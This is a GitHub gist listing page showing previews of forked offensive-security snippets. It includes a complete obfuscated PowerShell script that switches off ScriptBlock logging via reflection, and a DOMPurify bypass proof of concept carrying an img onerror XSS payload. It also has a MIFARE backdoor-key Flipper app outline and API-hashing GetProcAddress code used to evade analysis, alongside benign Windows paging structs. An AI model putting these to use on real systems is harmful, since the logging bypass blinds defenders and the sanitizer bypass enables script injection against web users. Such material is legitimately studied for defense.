@gavz
gavz / gist:e7bd406e17b6541f293b2d64979730c0
Created August 17, 2024 22:36 — forked from dmaynor/gist:f1973ae244b5c2ed83d3b8e19f798f97
Mifare crypto backdoor flipper app
Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called **.fap** (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`.
Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment.
### **Step 1: Set Up the Development Environment**
1. **Install Flipper Zero SDK:**
- Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment.
2. **Clone the Flipper Zero Firmware:**
@gavz
gavz / app.js
Created July 17, 2024 19:05 — forked from kevin-mizu/app.js
DOMPurify bypass using ISO-2022-JP
const createDOMPurify = require("dompurify");
const { JSDOM } = require("jsdom");
const http = require("http");
const server = http.createServer((req, res) => {
const window = new JSDOM("").window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`);
res.statusCode = 200;
@gavz
gavz / arnold.md
Created July 17, 2024 18:53 — forked from EvanMcBroom/arnold.md
IllBeBack - An Undocumented Function

Microsoft purchased the software Softricity SoftGrid in 2006 and renamed it to Microsoft Application Virtualization, or App-V for short. Windows shipped with several libraries in System32 and SysWOW64 to support App-V.

AppVTerminator.dll

One App-V library stands out from all the rest because it only has one exported function named IllBeBack... That's right! A library signed by Microsoft, with Terminator in the name, that only has a single callable function named IllBeBack.

@gavz
gavz / ScriptBlockLogBypass.ps1
Created June 17, 2024 21:10 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@gavz
gavz / CheckHvpt.c
Created June 17, 2024 20:54 — forked from tandasat/CheckHvpt.c
C code to check HVPT availability
#include <stdio.h>
#include <assert.h>
#include <Windows.h>
// Some of these definitions are taken (and modified) from https://github.com/winsiderss/systeminformer
typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION
{
BOOLEAN SecureKernelRunning : 1;
BOOLEAN HvciEnabled : 1;
@gavz
gavz / 0000-thecus-firmware-decrypt.sh
Created June 12, 2024 22:47 — forked from nstarke/0000-thecus-firmware-decrypt.sh
Thecus Firmware Decrypt Bash Script
#!/bin/bash
#
# This script takes a Thecus Firmware Image and decrypts it.
# The encryption key is based off of one of the supported
# models, which are listed in the firmware filename. This
# script will try all of the model names in the file name
# and delete any that do not decrypt to a gzip file.
#
# You will need the following c program compiled and passed
@gavz
gavz / log_and_scripts_api_resolving_with_x64dbg.md
Created May 30, 2024 23:28 — forked from a1ext/log_and_scripts_api_resolving_with_x64dbg.md
Log and scripts used in the following video: [Resolving APIs dynamically with Labeless & x64dbg](https://youtu.be/hMWuWVRkpB0)

Resolving APIs dynamically with Labeless & x64dbg

Previous part Resolving APIs dynamically with Labeless & OllyDbg2

Hi, now we try to do the same things using x64dbg with an x64 target application...

Let's try to find out the differences we need to make in the IDA Python script...

As the base, I use the previous script (see the video on how to do the same in OllyDbg 2).

@gavz
gavz / get_proc_address.c
Created May 28, 2024 20:18 — forked from mr-r3bot/get_proc_address.c
Customized GetProcAddress and GetModuleHandle and handle redirected function with API hashing
UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String)
{
SIZE_T Index = 0;
UINT32 Hash = 0;
SIZE_T Length = lstrlenA(String);
while (Index != Length)
{
Hash += String[Index++];
Hash += Hash << INITIAL_SEED;
@gavz
gavz / pml4e.c
Created May 13, 2024 22:22 — forked from mvankuipers/pml4e.c
Structure defining a PML4 entry in IA-32e paging.
typedef struct _PML4E
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PDPT.
@gavz
gavz / pdpte.c
Created May 13, 2024 22:22 — forked from mvankuipers/pdpte.c
Structure defining a page directory pointer table (PDPT) entry in IA-32e paging.
typedef struct _PDPTE
{
union
{
struct
{
ULONG64 Present : 1; // Must be 1, region invalid if 0.
ULONG64 ReadWrite : 1; // If 0, writes not allowed.
ULONG64 UserSupervisor : 1; // If 0, user-mode accesses not allowed.
ULONG64 PageWriteThrough : 1; // Determines the memory type used to access PD.